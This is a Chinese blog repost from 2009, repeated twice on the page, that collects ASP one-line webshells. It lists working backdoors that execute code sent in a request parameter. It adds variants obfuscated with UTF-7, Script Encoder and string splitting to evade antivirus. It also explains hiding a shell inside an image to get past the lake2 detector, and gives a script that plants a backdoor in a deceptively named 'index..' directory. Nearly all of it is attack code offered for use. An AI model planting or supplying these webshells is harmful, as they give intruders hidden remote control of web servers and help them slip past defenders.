[zz]一句话木马的部分整理
2009-08-17 08:46
239 查看
<%execute request("#")%>
<%execute request(chr(35))%>
<script language=VBScript runat=server>if request(chr(35))<>"""" then
ExecuteGlobal request(chr(35))
</script>
<%ExecuteGlobal request(chr(35))%>
<%eval request("#")%>
以上都是正常的SHELL,下面几个是变形,或者是用来免杀的
数据库里插入
┼攠數畣整爠煥敵瑳∨∣┩愾
utf-7的马
<%@ codepage=65000%>
<% response.Charset="936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
用include包含一个图片,图片最好是通过copy /b 1.jpg+1.asp+1.jpg 2.jpg生成出来的
要绕过lake2的话,用几个变量加常量的方法定义图片名再包含就可以了
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>
Script Encoder 加密
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>
另外还一个另类的,利用windows的目录漏洞,建立..\目录里面放一句话,
Set fso=Server.CreateObject("Scripting.FileSystemObject")
path=server.mappath("/")
Set f = fso.CreateFolder(path&"\index..\")
Set a = fso.CreateTextFile(path&"\index..\1.asp", True)
a.WriteLine"<script language=VBScript runat=server>if request(""&pass&"")<>"""" then"
a.WriteLine"response.clear"
a.WriteLine"Execute request(chr(35))"
a.WriteLine"response.end"
a.WriteLine"end if"
a.WriteLine"</script>"
一句话的木马并不只是有这些.脚本语言中大多数和系统交互的函数都能够用来作为后门.安全性和可用性是不可逆的.
http://forum.eviloctal.com/viewthread.php?tid=38303
<%execute request(chr(35))%>
<script language=VBScript runat=server>if request(chr(35))<>"""" then
ExecuteGlobal request(chr(35))
</script>
<%ExecuteGlobal request(chr(35))%>
<%eval request("#")%>
以上都是正常的SHELL,下面几个是变形,或者是用来免杀的
数据库里插入
┼攠數畣整爠煥敵瑳∨∣┩愾
utf-7的马
<%@ codepage=65000%>
<% response.Charset="936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
用include包含一个图片,图片最好是通过copy /b 1.jpg+1.asp+1.jpg 2.jpg生成出来的
要绕过lake2的话,用几个变量加常量的方法定义图片名再包含就可以了
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>
Script Encoder 加密
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>
另外还一个另类的,利用windows的目录漏洞,建立..\目录里面放一句话,
Set fso=Server.CreateObject("Scripting.FileSystemObject")
path=server.mappath("/")
Set f = fso.CreateFolder(path&"\index..\")
Set a = fso.CreateTextFile(path&"\index..\1.asp", True)
a.WriteLine"<script language=VBScript runat=server>if request(""&pass&"")<>"""" then"
a.WriteLine"response.clear"
a.WriteLine"Execute request(chr(35))"
a.WriteLine"response.end"
a.WriteLine"end if"
a.WriteLine"</script>"
一句话的木马并不只是有这些.脚本语言中大多数和系统交互的函数都能够用来作为后门.安全性和可用性是不可逆的.
http://forum.eviloctal.com/viewthread.php?tid=38303
相关文章推荐
- 一句话木马的部分整理
- 一句话木马大全 - 整理的比较全的一句话后门代码
- asp,php一句话木马整理方便查找木马
- asp,php一句话木马整理方便查找木马
- WINDOWS SERVER2003防木马权限设置配置整理
- 最近面试前端面试题整理(css部分)
- HTML+CSS PC端 手机端 公用部分样式代码整理
- 一句话木马中突破〈%%〉标记过滤
- webshell一句话木马
- 整理一下 jQuery 1.4.2 自己常用的部分
- Win2003 防木马、权限设置、IIS服务器安全配置整理
- Win2003 防木马、权限设置、IIS服务器安全配置整理
- ARM 微处理器部分指令实例整理(持续增加...)
- php 小数整理,向上取整,向下去整,四舍五入,丢弃小数部分,保留整数部分
- 阿里部分面试题整理
- 【整理】eclipse.ini/myeclipse.ini文件中参数配置【zz】
- 整理的比较全的一句话后门代码(方面大家查找后门)
- yii2.0 内部的可以使用的部分方法整理
- 评估密码强度JS脚本(整理部分)
- MediaCenter开发整理(四)安装部分